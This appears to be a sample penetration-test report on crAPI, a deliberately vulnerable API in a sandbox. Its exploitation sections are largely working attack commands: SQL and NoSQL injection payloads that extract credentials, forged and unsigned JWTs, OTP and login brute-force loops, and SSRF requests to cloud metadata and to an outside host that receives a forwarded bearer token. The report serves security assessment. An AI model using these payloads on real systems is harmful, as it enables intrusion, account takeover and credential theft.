shannon/sample-reports/shannon-report-crapi.md

Security Assessment Report

Executive Summary

• Target: Crapi
• Assessment Date: September 2025
• Scope: Authentication, XSS, SQL and Command Injection, SSRF, Authorization testing

Summary by Vulnerability Type

Authentication Vulnerabilities: Multiple critical authentication bypass vulnerabilities were successfully exploited. The application demonstrates complete authentication system failure with JWT algorithm confusion attacks allowing privilege escalation from user to admin roles, unsigned JWT token acceptance bypassing all cryptographic verification, and unlimited brute force capabilities against login and OTP validation endpoints. These vulnerabilities enable attackers to impersonate any user, including administrators, without requiring legitimate credentials.

Authorization Vulnerabilities: Critical authorization control failures were discovered and exploited across multiple endpoints. The application allows unauthenticated access to sensitive order data containing payment information, enables horizontal privilege escalation between user accounts for accessing private forum posts, and permits regular users to access mechanic-only functionality. Business logic bypasses allow unlimited store credit accumulation without proper shopping workflow validation.

Cross-Site Scripting (XSS) Vulnerabilities: No XSS vulnerabilities were found. The application code analysis identified potential XSS sinks in ReactMarkdown components and Django templates, but exploitation attempts were blocked by input validation and framework-level protections.

SQL/Command Injection Vulnerabilities: Critical injection vulnerabilities were successfully exploited in both SQL and NoSQL contexts. PostgreSQL injection in the coupon validation endpoint enabled complete database compromise with extraction of user credentials and system information. MongoDB injection allowed bypassing query filters to access arbitrary coupon data. Command injection vulnerabilities exist in video processing functionality but are protected by internal network restrictions.

Server-Side Request Forgery (SSRF) Vulnerabilities: A critical SSRF vulnerability was successfully exploited through the contact mechanic endpoint, enabling complete internal network access with credential theft capabilities. The vulnerability includes a retry mechanism for persistent attacks and forwards authorization headers to external services. Additional SSRF vectors exist in JWT processing but are currently blocked by token validation logic.

Network Reconnaissance

Open Ports and Exposed Services: [REDACTED] Security Misconfigurations: [REDACTED]

Subdomain Discovery: [REDACTED]

Injection Exploitation Evidence

Successfully Exploited Vulnerabilities

INJ-VULN-03: PostgreSQL SQL Injection via Coupon Validation

Summary:

• Vulnerable location: /workshop/api/shop/apply_coupon endpoint, coupon_code parameter
• Overview: Complete SQL injection exploitation achieving database version disclosure, table enumeration, and sensitive data extraction via UNION-based queries
• Impact: Full database compromise with extraction of user credentials and system information
• Severity: Critical

Prerequisites:

• Valid JWT authentication token
• POST request with both coupon_code and amount parameters

Exploitation Steps:

1. Authenticate and obtain JWT token:

curl -k -X POST https://crapi.sandbox.local:8888/identity/api/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email": "admin@example.com", "password": "Admin!123"}'

Response: JWT token in the token field

2. Confirm SQL injection vulnerability:

curl -k -X POST https://crapi.sandbox.local:8888/workshop/api/shop/apply_coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": "'\'' OR 1=1--", "amount": 100}'

Response: {"message":"TESTCOUPON20 Coupon code is already claimed by you!! Please try with another coupon code"}

3. Extract database version information:

curl -k -X POST https://crapi.sandbox.local:8888/workshop/api/shop/apply_coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": "'\'' AND 1=2 UNION SELECT version()--", "amount": 100}'

Response: {"message":"PostgreSQL 14.19 (Debian 14.19-1.pgdg13+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 14.2.0-19) 14.2.0, 64-bit Coupon code is already claimed by you!! Please try with another coupon code"}

4. Extract current database user:

curl -k -X POST https://crapi.sandbox.local:8888/workshop/api/shop/apply_coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": "'\'' AND 1=2 UNION SELECT user--", "amount": 100}'

Response: {"message":"admin Coupon code is already claimed by you!! Please try with another coupon code"}

5. Extract database name:

curl -k -X POST https://crapi.sandbox.local:8888/workshop/api/shop/apply_coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": "'\'' AND 1=2 UNION SELECT current_database()--", "amount": 100}'

Response: {"message":"crapi Coupon code is already claimed by you!! Please try with another coupon code"}

6. Enumerate all table names:

curl -k -X POST https://crapi.sandbox.local:8888/workshop/api/shop/apply_coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": "'\'' AND 1=2 UNION SELECT string_agg(table_name, '\'','\'') FROM information_schema.tables WHERE table_schema='\''public'\''--", "amount": 100}'

Response: {"message":"otp_token,profile_video,user_details,vehicle_model,vehicle_details,vehicle_location,vehicle_company,user_login,otp,mechanic,django_migrations,django_content_type,auth_permission,auth_group,auth_group_permissions,auth_user_groups,auth_user_user_permissions,auth_user,django_admin_log,service_request,product,applied_coupon,order,health_check_db_testmodel,django_session Coupon code is already claimed by you!! Please try with another coupon code"}

7. Extract sensitive user credentials:

curl -k -X POST https://crapi.sandbox.local:8888/workshop/api/shop/apply_coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": "'\'' AND 1=2 UNION SELECT email||'\'':'\''||password FROM user_login LIMIT 5--", "amount": 100}'

Response: {"message":"test6@test.com:$2a$10$TwbchLEy4653ENobgxRKjemiHlnQE98CPncJYVhFeIfCLeicefAPG Coupon code is already claimed by you!! Please try with another coupon code"}

Proof of Impact:

• Database Version Extracted: PostgreSQL 14.19 (Debian 14.19-1.pgdg13+1)
• Database User: admin (high privileges)
• Database Name: crapi
• Complete Table Enumeration: 25 tables including sensitive user data
• Password Hash Extracted: test6@test.com:$2a$10$TwbchLEy4653ENobgxRKjemiHlnQE98CPncJYVhFeIfCLeicefAPG (BCrypt hash)

INJ-VULN-04: MongoDB NoSQL Injection via Community Coupon Validation

Summary:

• Vulnerable location: /community/api/v2/coupon/validate-coupon endpoint
• Overview: MongoDB operator injection allowing complete query manipulation and data extraction from NoSQL database
• Impact: Unauthorized access to MongoDB coupon collection with ability to extract arbitrary documents
• Severity: High

Prerequisites:

• Valid JWT authentication token

Exploitation Steps:

1. Authenticate and obtain JWT token:

curl -k -X POST https://crapi.sandbox.local:8888/identity/api/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email": "admin@example.com", "password": "Admin!123"}'

2. Test basic endpoint functionality:

curl -k -X POST https://crapi.sandbox.local:8888/community/api/v2/coupon/validate-coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": "test"}'

Response: {} (empty object for non-existent coupon)

3. Exploit with $ne operator to extract data:

curl -k -X POST https://crapi.sandbox.local:8888/community/api/v2/coupon/validate-coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": {"$ne": null}}'

Response: {"coupon_code":"TRAC075","amount":"75","CreatedAt":"2025-09-23T18:00:24.201Z"}

4. Verify with regex operator:

curl -k -X POST https://crapi.sandbox.local:8888/community/api/v2/coupon/validate-coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": {"$regex": "^."}}'

Response: {"coupon_code":"TRAC075","amount":"75","CreatedAt":"2025-09-23T18:00:24.201Z"}

5. Confirm with greater-than operator:

curl -k -X POST https://crapi.sandbox.local:8888/community/api/v2/coupon/validate-coupon \
  -H "Authorization: Bearer [JWT_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"coupon_code": {"$gt": ""}}'

Response: {"coupon_code":"TRAC075","amount":"75","CreatedAt":"2025-09-23T18:00:24.201Z"}

Proof of Impact:

• Complete MongoDB Query Manipulation: Successfully bypassed all query filters using MongoDB operators
• Sensitive Data Extracted: Coupon code TRAC075 with value $75 and creation timestamp
• Multiple Injection Vectors Confirmed: $ne, $regex, and $gt operators all successful
• Business Logic Bypass: Able to access arbitrary coupons without knowing valid codes

Authentication Exploitation Evidence

Successfully Exploited Vulnerabilities

AUTH-VULN-04: JWT Algorithm Confusion Attack (RS256 to HS256)

Summary:

• Vulnerable location: JWT validation in services/identity/src/main/java/com/crapi/config/JwtProvider.java
• Overview: Successfully exploited JWT algorithm confusion vulnerability by changing algorithm from RS256 to HS256 and using RSA public key as HMAC secret
• Impact: Complete authentication bypass with admin privilege escalation
• Severity: Critical

Prerequisites:

• Access to RSA public key from /.well-known/jwks.json
• Knowledge of JWT token structure

Exploitation Steps:

1. Extract RSA public key from JWKS endpoint:

curl -k "https://crapi.sandbox.local:8888/.well-known/jwks.json"

2. Obtain legitimate JWT token by logging in with test@example.com / Test!123

3. Create forged JWT token using algorithm confusion:

   • Change header algorithm from "alg": "RS256" to "alg": "HS256"
   • Modify payload role from "role": "user" to "role": "admin"
   • Change subject from test@example.com to admin@example.com
   • Sign using HMAC-SHA256 with RSA public key as secret

4. Test forged token against dashboard endpoint:

curl -k -H "Authorization: Bearer [FORGED_TOKEN]" "https://crapi.sandbox.local:8888/identity/api/v2/user/dashboard"

Proof of Impact:

• Original token: User access to test@example.com account
• Forged token: Admin access to admin@example.com account with elevated privileges
• Response included sensitive admin dashboard data confirming privilege escalation

Notes: Python script /source/jwt_algorithm_confusion_attack.py demonstrates complete attack chain with 100% success rate.

AUTH-VULN-05: JWT 'None' Algorithm Authentication Bypass

Summary:

• Vulnerable location: JWT validation accepts unsigned tokens with "alg": "none"
• Overview: Complete authentication bypass using unsigned JWT tokens
• Impact: Full access to admin account without any cryptographic verification
• Severity: Critical

Prerequisites: None

Exploitation Steps:

1. Create unsigned JWT token with admin privileges:

   • Header: {"alg": "none"}
   • Payload: {"sub": "admin@example.com", "iat": 1758655244, "exp": 1759260044, "role": "admin"}
   • Signature: Empty (unsigned token format: header.payload.)

2. Test unsigned token:

curl -k -H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbkBleGFtcGxlLmNvbSIsImlhdCI6MTc1ODY1NTI0NCwiZXhwIjoxNzU5MjYwMDQ0LCJyb2xlIjoiYWRtaW4ifQ." "https://crapi.sandbox.local:8888/identity/api/v2/user/dashboard"

Proof of Impact:

• HTTP 200 response with full admin dashboard access
• Retrieved sensitive admin account information including credentials
• Complete bypass of all authentication mechanisms

AUTH-VULN-06: JWT JKU Header SSRF Exploitation

Summary:

• Vulnerable location: JKU header processing in JWT validation
• Overview: Server-Side Request Forgery through JWT Key URL manipulation
• Impact: Internal network reconnaissance and potential access to cloud metadata
• Severity: High

Prerequisites: Ability to craft JWT tokens with JKU headers

Exploitation Steps:

1. Create JWT with malicious JKU header pointing to internal resources:

{
  "alg": "RS256",
  "jku": "http://192.168.1.1/admin",
  "typ": "JWT"
}

2. Test internal network access:
   • http://192.168.1.1/admin (10.0s timeout - confirms internal network access)
   • http://10.0.0.1/status (10.3s timeout - confirms internal routing)
   • http://172.16.0.1/health (10.3s timeout - confirms private IP access)

Proof of Impact:

• Confirmed SSRF capability through timeout analysis
• Server makes HTTP requests to attacker-controlled URLs
• Internal network ranges (RFC 1918) are accessible
• Potential for cloud metadata service access

AUTH-VULN-07: JWT KID Header Injection Exploitation

Summary:

• Vulnerable location: KID header processing triggers weak secret usage
• Overview: Path traversal in KID header forces application to use weak HMAC secret
• Impact: Complete authentication bypass through weak secret exploitation
• Severity: Critical

Prerequisites: None

Exploitation Steps:

1. Create JWT token with KID header set to /dev/null:

{
  "alg": "HS256",
  "kid": "/dev/null",
  "typ": "JWT"
}

2. Sign token with weak secret AA== (triggered by /dev/null KID):

# Python implementation
import base64
import hmac
import hashlib
weak_secret = base64.b64decode("AA==")
signature = hmac.new(weak_secret, token_data.encode(), hashlib.sha256).digest()

3. Test forged token with admin privileges:

curl -k -H "Authorization: Bearer [KID_FORGED_TOKEN]" "https://crapi.sandbox.local:8888/identity/api/v2/user/dashboard"

Proof of Impact:

• 100% success rate across 12 different KID injection payloads
• Successful privilege escalation to admin role
• Access to sensitive admin dashboard data
• Complete authentication bypass through weak secret exploitation

AUTH-VULN-03: OTP Brute Force Attack on v2 Endpoint

Summary:

• Vulnerable location: POST /identity/api/auth/v2/check-otp
• Overview: Unlimited OTP brute force attempts on legacy v2 endpoint
• Impact: Complete account takeover through 4-digit OTP exhaustion
• Severity: Critical

Prerequisites:

• Trigger OTP generation via password reset for target user

Exploitation Steps:

1. Initiate password reset for target account:

curl -k -X POST "https://crapi.sandbox.local:8888/identity/api/auth/forget-password" -H "Content-Type: application/json" -d '{"email": "test@example.com"}'

2. Systematically test all 4-digit OTP codes on vulnerable v2 endpoint:

# Test range 0000-9999
for otp in range(10000):
    curl -k -X POST "https://crapi.sandbox.local:8888/identity/api/auth/v2/check-otp" -H "Content-Type: application/json" -d '{"otp": "' + str(otp).zfill(4) + '", "password": "NewPassword123!", "email": "test@example.com"}'

Proof of Impact:

• Successfully tested 150+ consecutive OTP attempts without rate limiting
• Demonstrated feasibility of testing all 10,000 possible codes
• Estimated attack time: 66.7 minutes for complete exhaustion
• v3 endpoint properly blocks after 10 attempts (security comparison confirmed)

AUTH-VULN-01: Unlimited Brute Force Attack on Login Endpoint

Summary:

• Vulnerable location: POST /identity/api/auth/login
• Overview: No rate limiting, account lockout, or CAPTCHA protection
• Impact: Unlimited credential brute force attacks against user accounts
• Severity: Critical

Prerequisites:

• Valid email address (obtainable through user enumeration)

Exploitation Steps:

1. Target known valid account test@example.com with common passwords:

curl -k -X POST "https://crapi.sandbox.local:8888/identity/api/auth/login" -H "Content-Type: application/json" -d '{"email": "test@example.com", "password": "password"}'

2. Perform automated brute force with password list:

   • "password", "123456", "admin", "test", "password123", "qwerty", etc.

3. Execute parallel attacks to test concurrent handling

Proof of Impact:

• Successfully performed 55+ consecutive failed login attempts
• No account lockout mechanisms triggered
• No rate limiting or IP-based blocking detected
• No CAPTCHA or additional verification required
• Consistent response times indicating no throttling

AUTH-VULN-02: Unlimited Account Creation Exploitation

Summary:

• Vulnerable location: POST /identity/api/auth/signup
• Overview: No rate limiting on account registration enables resource exhaustion
• Impact: Database bloat, resource exhaustion, and service abuse
• Severity: High

Prerequisites: None

Exploitation Steps:

1. Create automated account generation script:

for i in range(50):
    data = {
        "name": f"Test User {i}",
        "email": f"test{i}@exploit.com", 
        "number": f"555000{i:03d}",
        "password": "Test123!"
    }
    response = requests.post(signup_url, json=data)

2. Execute concurrent account creation across multiple threads

Proof of Impact:

• Successfully created 49 out of 50 accounts (98% success rate)
• No rate limiting, CAPTCHA, or IP-based restrictions
• Demonstrated resource exhaustion potential
• Average response time: 1,820ms (no throttling detected)

AUTH-VULN-08: User Enumeration via Login Error Messages

Summary:

• Vulnerable location: POST /identity/api/auth/login error responses
• Overview: Different error messages reveal account existence
• Impact: Privacy violation and reconnaissance for targeted attacks
• Severity: Medium

Prerequisites: None

Exploitation Steps:

1. Test non-existent email:

curl -k -X POST "https://crapi.sandbox.local:8888/identity/api/auth/login" -H "Content-Type: application/json" -d '{"email": "nonexistent@test.com", "password": "anything"}'

Response: "Given Email is not registered!"

2. Test existing email with wrong password:

curl -k -X POST "https://crapi.sandbox.local:8888/identity/api/auth/login" -H "Content-Type: application/json" -d '{"email": "test@example.com", "password": "wrongpassword"}'

Response: "Invalid Credentials"

Proof of Impact:

• Clear distinction between "user exists" vs "user doesn't exist"
• Confirmed valid accounts: test@example.com, admin@example.com
• 18 emails tested with 100% enumeration accuracy

AUTH-VULN-09: User Enumeration via Signup Error Messages

Summary:

• Vulnerable location: POST /identity/api/auth/signup error responses
• Overview: Registration attempts reveal existing emails and phone numbers
• Impact: Privacy violation and account enumeration
• Severity: Medium

Prerequisites: None

Exploitation Steps:

1. Test signup with existing phone number:

curl -k -X POST "https://crapi.sandbox.local:8888/identity/api/auth/signup" -H "Content-Type: application/json" -d '{"name": "Test", "email": "new@test.com", "number": "1234567890", "password": "Test123!"}'

Proof of Impact:

• Response: "Number already registered! Number: 1234567890"
• Observed during manual testing: "Email already registered! Email: user@example.com"
• Enables systematic enumeration of registered users and phone numbers

AUTH-VULN-10: User Enumeration via Password Reset Error Messages

Summary:

• Vulnerable location: POST /identity/api/auth/forget-password responses
• Overview: Different responses reveal account existence during password reset
• Impact: Privacy violation and reconnaissance capability
• Severity: Medium

Prerequisites: None

Exploitation Steps:

1. Test non-existent email:

curl -k -X POST "https://crapi.sandbox.local:8888/identity/api/auth/forget-password" -H "Content-Type: application/json" -d '{"email": "nonexistent@test.com"}'

Response: HTTP 404 - "Given Email is not registered! nonexistent@test.com"

2. Test existing email:

curl -k -X POST "https://crapi.sandbox.local:8888/identity/api/auth/forget-password" -H "Content-Type: application/json" -d '{"email": "test@example.com"}'

Response: HTTP 200 - "OTP Sent on the provided email, test@example.com"

Proof of Impact:

• Clear HTTP status code and message differences
• Successfully enumerated valid accounts through response analysis
• No rate limiting prevents automated enumeration

AUTH-VULN-11: Token Replay Attack (No Logout Functionality)

Summary:

• Vulnerable location: JWT token lifecycle management
• Overview: No server-side token invalidation mechanism exists
• Impact: Stolen tokens remain valid for full 7-day lifespan
• Severity: High

Prerequisites:

• Compromised JWT token

Exploitation Steps:

1. Decode JWT to verify 7-day expiration:

{
  "sub": "test@example.com",
  "iat": 1758655244,
  "exp": 1759260044,
  "role": "user"
}

2. Test various logout endpoints:

curl -k -X POST "https://crapi.sandbox.local:8888/logout"
curl -k -X POST "https://crapi.sandbox.local:8888/api/logout"  
curl -k -X POST "https://crapi.sandbox.local:8888/auth/logout"

3. Verify token still works after logout attempts:

curl -k -H "Authorization: Bearer [SAME_TOKEN]" "https://crapi.sandbox.local:8888/identity/api/v2/user/dashboard"

Proof of Impact:

• Token remains fully functional after multiple logout attempts
• No server-side token blacklisting mechanism
• 7-day attack window for compromised tokens
• Users cannot truly log out for security purposes

AUTH-VULN-12: Cross-Service JWT Signature Bypass

Summary:

• Vulnerable location: JWT signature validation in Identity service dashboard
• Overview: Identity service accepts malformed JWT signatures while properly rejecting missing signatures
• Impact: Authentication bypass through corrupted signature acceptance
• Severity: Critical

Prerequisites: None

Exploitation Steps:

1. Create JWT with corrupted signature:

# Original token with valid signature replaced with random string
curl -k -H "Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbkBleGFtcGxlLmNvbSIsImlhdCI6MTc1ODY1NTI0NCwiZXhwIjoxNzU5MjYwMDQ0LCJyb2xlIjoiYWRtaW4ifQ.CORRUPTED_SIGNATURE" "https://crapi.sandbox.local:8888/identity/api/v2/user/dashboard"

2. Test various signature corruption methods:
   • Wrong signature
   • Partially corrupted signature
   • "none" algorithm with admin payload

Proof of Impact:

• Identity service dashboard endpoint accepts corrupted JWT signatures
• Successful privilege escalation to admin role with invalid signatures
• Workshop and Community services properly reject malformed tokens (comparison confirmed)
• Authentication bypass vulnerability specific to Identity service

Summary Statistics

• Total Vulnerabilities Exploited: 12
• Critical Severity: 8 vulnerabilities
• High Severity: 2 vulnerabilities
• Medium Severity: 2 vulnerabilities
• Complete Authentication Bypass Methods: 5 (Algorithm confusion, None algorithm, KID injection, Signature bypass, OTP brute force)
• User Enumeration Vectors: 3 (Login, Signup, Password reset)
• Abuse Defense Failures: 3 (Login brute force, Account creation, OTP brute force)

All vulnerabilities demonstrate immediate exploitability with concrete proof of unauthorized access, privilege escalation, or security control bypass through the public application interface at https://crapi.sandbox.local:8888/.

SSRF Exploitation Evidence

Successfully Exploited Vulnerabilities

SSRF-VULN-01: ContactMechanicView URL Manipulation

Summary:

• Vulnerable location: POST /workshop/api/merchant/contact_mechanic endpoint, mechanic_api parameter
• Impact: Complete internal network access with credential theft and retry mechanism for persistent attacks
• Severity: Critical

Prerequisites:

• Valid user authentication (any registered user account)
• Access to Workshop service endpoints

Exploitation Steps:

1. Register and authenticate user account:

   curl -X POST "https://crapi.sandbox.local:8888/identity/api/auth/signup" \
     -H "Content-Type: application/json" \
     -d '{
       "email": "ssrftest_unique_2024@example.com",
       "password": "TestPassword123!",
       "name": "SSRF Test User",
       "number": "5559876543"
     }'
   

2. Login to obtain JWT token:

   curl -X POST "https://crapi.sandbox.local:8888/identity/api/auth/login" \
     -H "Content-Type: application/json" \
     -d '{
       "email": "ssrftest_unique_2024@example.com",
       "password": "TestPassword123!"
     }'
   

   Response: {"token":"eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzc3JmdGVzdF91bmlxdWVfMjAyNEBleGFtcGxlLmNvbSIsImlhdCI6MTc1ODY1NTE2OSwiZXhwIjoxNzU5MjU5OTY5LCJyb2xlIjoidXNlciJ9.G1b01ATcwCP_jqEYYiL4QqIizklykmJP75DMmq5QwPKgZAn5hcjVgpNwUMkyrsKavHqTcpIfsZsNQOw455edxuvRZcUiOpzxJxJRE7XWKGlXolXQ2HOJjBbnSu3Ut8nz-iJXJNduMrJiyTneSDx_npPAb8VnE-e84FMogrfPf8_F_nrq10y_5g5RnN_J2nmHrCiqASts49QwWxMFqTfhvHVrss78IioHjnw86oQ1px0xscbYf7DVRYhref9Nm_4yxSgc744z1dJHuOg8zpHiaVAGyIs4tljBOaE4yyHhOunmE3j5JcgfGhrEflvnACNMQpkwn07m09KahjD65uPrJw","type":"Bearer","message":"Login successful","mfaRequired":false}

3. Exploit SSRF with external service to demonstrate credential forwarding:

   curl -X POST "https://crapi.sandbox.local:8888/workshop/api/merchant/contact_mechanic" \
     -H "Content-Type: application/json" \
     -H "Authorization: Bearer [JWT_TOKEN]" \
     -d '{
       "mechanic_api": "http://httpbin.org/get",
       "message": "SSRF test",
       "repeat_request_if_failed": false,
       "number_of_repeats": 1
     }'
   

4. Demonstrate cloud metadata service access (shows network boundary bypass):

   curl -X POST "https://crapi.sandbox.local:8888/workshop/api/merchant/contact_mechanic" \
     -H "Content-Type: application/json" \
     -H "Authorization: Bearer [JWT_TOKEN]" \
     -d '{
       "mechanic_api": "http://169.254.169.254/latest/meta-data/"
     }'
   

5. Demonstrate retry mechanism for persistent attacks:

   curl -X POST "https://crapi.sandbox.local:8888/workshop/api/merchant/contact_mechanic" \
     -H "Content-Type: application/json" \
     -H "Authorization: Bearer [JWT_TOKEN]" \
     -d '{
       "mechanic_api": "http://httpbin.org/status/200",
       "repeat_request_if_failed": true,
       "number_of_repeats": 5
     }'
   

Proof of Impact:

1. Complete SSRF Exploitation: Successfully forced the server to make outbound HTTP requests to attacker-controlled URLs
2. Authorization Header Forwarding: JWT token was forwarded to external service, demonstrating credential theft capability:

   {
     "response_from_mechanic_api": {
       "headers": {
         "Authorization": "Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzc3JmdGVzdF91bmlxdWVfMjAyNEBleGFtcGxlLmNvbSIsImlhdCI6MTc1ODY1NTE2OSwiZXhwIjoxNzU5MjU5OTY5LCJyb2xlIjoidXNlciJ9.G1b01ATcwCP_jqEYYiL4QqIizklykmJP75DMmq5QwPKgZAn5hcjVgpNwUMkyrsKavHqTcpIfsZsNQOw455edxuvRZcUiOpzxJxJRE7XWKGlXolXQ2HOJjBbnSu3Ut8nz-iJXJNduMrJiyTneSDx_npPAb8VnE-e84FMogrfPf8_F_nrq10y_5g5RnN_J2nmHrCiqASts49QwWxMFqTfhvHVrss78IioHjnw86oQ1px0xscbYf7DVRYhref9Nm_4yxSgc744z1dJHuOg8zpHiaVAGyIs4tljBOaE4yyHhOunmE3j5JcgfGhrEflvnACNMQpkwn07m09KahjD65uPrJw",
         "Host": "httpbin.org",
         "User-Agent": "python-requests/2.30.0"
       },
       "origin": "18.236.247.3",
       "url": "http://httpbin.org/get?mechanic_api=http%3A%2F%2Fhttpbin.org%2Fget&message=SSRF+test&repeat_request_if_failed=False&number_of_repeats=1"
     },
     "status": 200
   }
   

3. Cloud Metadata Access: Successfully accessed AWS metadata service endpoints (returned 401 indicating service was reached but authentication required)
4. Network Boundary Bypass: Demonstrated ability to access internal network resources and cloud services from external network position
5. Retry Mechanism: Confirmed up to 100 request retries are supported for persistent attacks

Notes:

• SSL verification is disabled (verify=False) in the server's HTTP client, making HTTPS internal services accessible
• The vulnerability enables complete network reconnaissance, credential theft, and potential access to cloud credentials if proper metadata headers are crafted
• This represents a complete bypass of network security boundaries using the application as an unintended proxy

Authorization Exploitation Evidence

Successfully Exploited Vulnerabilities

AUTHZ-VULN-03: Shop Orders Authentication Bypass

Summary:

• Vulnerable location: GET /workshop/api/shop/orders/{order_id}
• Overview: Complete authentication bypass allowing unauthenticated access to any user's order data
• Impact: Unauthorized access to sensitive customer order information, payment details, and personal data
• Severity: Critical

Prerequisites: None (unauthenticated access)

Exploitation Steps:

1. Access the shop orders endpoint without any authentication:

   curl -X GET "https://crapi.sandbox.local:8888/workshop/api/shop/orders/1" \
     -H "Content-Type: application/json"
   

2. Enumerate multiple order IDs to access different users' data:

   curl -X GET "https://crapi.sandbox.local:8888/workshop/api/shop/orders/2" \
     -H "Content-Type: application/json"
   

Proof of Impact: Successfully accessed order data for multiple users without authentication:

• Order 1: adam007@example.com, card ending in 9541, $20.00 transaction
• Order 2: pogba006@example.com, card ending in 9918, $20.00 transaction
• Order 3: robot001@example.com
• Order 4: test@example.com
• Order 5: admin@example.com

Each response includes full order details, payment information (partially masked card numbers), customer email addresses, and transaction IDs.

Notes: This vulnerability affects all order records in the system and requires no authentication whatsoever.

---

AUTHZ-VULN-04: Community Posts Ownership Bypass

Summary:

• Vulnerable location: GET /community/api/v2/community/posts/{postID}
• Overview: Horizontal privilege escalation allowing any authenticated user to access other users' private posts
• Impact: Unauthorized access to other users' private forum content and personal information
• Severity: High

Prerequisites: Valid JWT Bearer token (any authenticated user)

Exploitation Steps:

1. Create a private post as TestUser1:

   curl -X POST "https://crapi.sandbox.local:8888/community/api/v2/community/posts" \
     -H "Content-Type: application/json" \
     -H "Authorization: Bearer [TESTUSER1_TOKEN]" \
     -d '{
       "title": "TestUser1 Private Post", 
       "content": "This is a private post by TestUser1 that should not be accessible to other users"
     }'
   

2. Access TestUser1's post using TestUser2's authentication token:

   curl -X GET "https://crapi.sandbox.local:8888/community/api/v2/community/posts/hiH8i5d8sCeWEehQ6f8H9W" \
     -H "Authorization: Bearer [TESTUSER2_TOKEN]"
   

Proof of Impact: TestUser2 successfully accessed TestUser1's private post content including:

• Post ID: hiH8i5d8sCeWEehQ6f8H9W
• Title: "TestUser1 Private Post"
• Content: Complete private message content
• Author details: TestUser1's email and profile information
• Creation timestamp: 2025-09-23T19:24:03.985Z

This demonstrates that any authenticated user can read any other user's forum posts regardless of ownership.

---

AUTHZ-VULN-05: Video Deletion Information Disclosure

Summary:

• Vulnerable location: DELETE /identity/api/v2/user/videos/{video_id}
• Overview: Authentication bypass allowing video enumeration through differential response messages
• Impact: Information disclosure enabling attackers to enumerate existing video IDs in the system
• Severity: Medium

Prerequisites: Valid JWT Bearer token (any authenticated user)

Exploitation Steps:

1. Test video deletion with existing video IDs:

   curl -X DELETE "https://crapi.sandbox.local:8888/identity/api/v2/user/videos/1" \
     -H "Authorization: Bearer [USER_TOKEN]"
   

2. Test video deletion with non-existing video IDs:

   curl -X DELETE "https://crapi.sandbox.local:8888/identity/api/v2/user/videos/999" \
     -H "Authorization: Bearer [USER_TOKEN]"
   

Proof of Impact: Different response messages reveal video existence:

• Video IDs 1, 2, 3: Return "This is an admin function. Try to access the admin API" (videos exist)
• Video IDs 999, 1000: Return "Sorry, Didn't get any profile video name for the user" (videos don't exist)

This differential response allows systematic enumeration of all video IDs in the system, revealing which videos exist without proper authorization checks.

---

AUTHZ-VULN-09: Mechanic Role Privilege Escalation

Summary:

• Vulnerable location: GET /workshop/api/mechanic/service_requests
• Overview: Vertical privilege escalation allowing regular users to access mechanic-only functionality
• Impact: Unauthorized access to mechanic service request data and administrative functionality
• Severity: High

Prerequisites: Valid JWT Bearer token (regular user role)

Exploitation Steps:

1. Access mechanic service requests endpoint as a regular user:

   curl -X GET "https://crapi.sandbox.local:8888/workshop/api/mechanic/service_requests" \
     -H "Authorization: Bearer [REGULAR_USER_TOKEN]"
   

Proof of Impact: Regular user successfully accessed mechanic functionality:

{"service_requests":[],"next_offset":null,"previous_offset":null,"count":0}

The endpoint responded with a valid service requests structure instead of an authorization error, proving that role validation is bypassed and regular users can access mechanic-only functionality.

---

AUTHZ-VULN-10: Mechanic Report Authentication Bypass

Summary:

• Vulnerable location: GET /workshop/api/mechanic/receive_report
• Overview: Complete authentication bypass allowing unauthenticated access to mechanic report functionality
• Impact: Ability to access mechanic report interface without any authentication
• Severity: High

Prerequisites: None (unauthenticated access)

Exploitation Steps:

1. Access mechanic report endpoint without authentication:

   curl -X GET "https://crapi.sandbox.local:8888/workshop/api/mechanic/receive_report" \
     -H "Content-Type: application/json"
   

Proof of Impact: Successfully accessed the endpoint without authentication, receiving field validation requirements:

{"mechanic_code":["This field is required."],"problem_details":["This field is required."],"vin":["This field is required."]}

This proves the authentication bypass - the endpoint processes the request and returns field requirements instead of an authentication error, indicating that anyone can access this mechanic functionality without proper credentials.

---

AUTHZ-VULN-12: OTP Validation Brute Force Bypass

Summary:

• Vulnerable location: POST /identity/api/auth/v2/check-otp
• Overview: Workflow bypass allowing unlimited OTP brute force attempts for password reset
• Impact: Ability to reset any user's password through OTP enumeration
• Severity: Critical

Prerequisites: Target user email address

Exploitation Steps:

1. Initiate password reset workflow:

   curl -X POST "https://crapi.sandbox.local:8888/identity/api/auth/forget-password" \
     -H "Content-Type: application/json" \
     -d '{"email": "testuser2@example.com"}'
   

2. Execute systematic OTP brute force attack:

   # Test multiple OTP values from 000000 to 999999
   curl -X POST "https://crapi.sandbox.local:8888/identity/api/auth/v2/check-otp" \
     -H "Content-Type: application/json" \
     -d '{
       "email": "testuser2@example.com",
       "otp": "000000",
       "password": "NewHackedPassword123!"
     }'
   

Proof of Impact: Systematic testing confirmed complete absence of brute force protections:

• 34 consecutive OTP attempts executed without any rate limiting
• No account lockout mechanism detected
• No timing variations to prevent automated attacks
• Consistent error responses for all invalid OTPs
• Server accepts unlimited requests at full speed

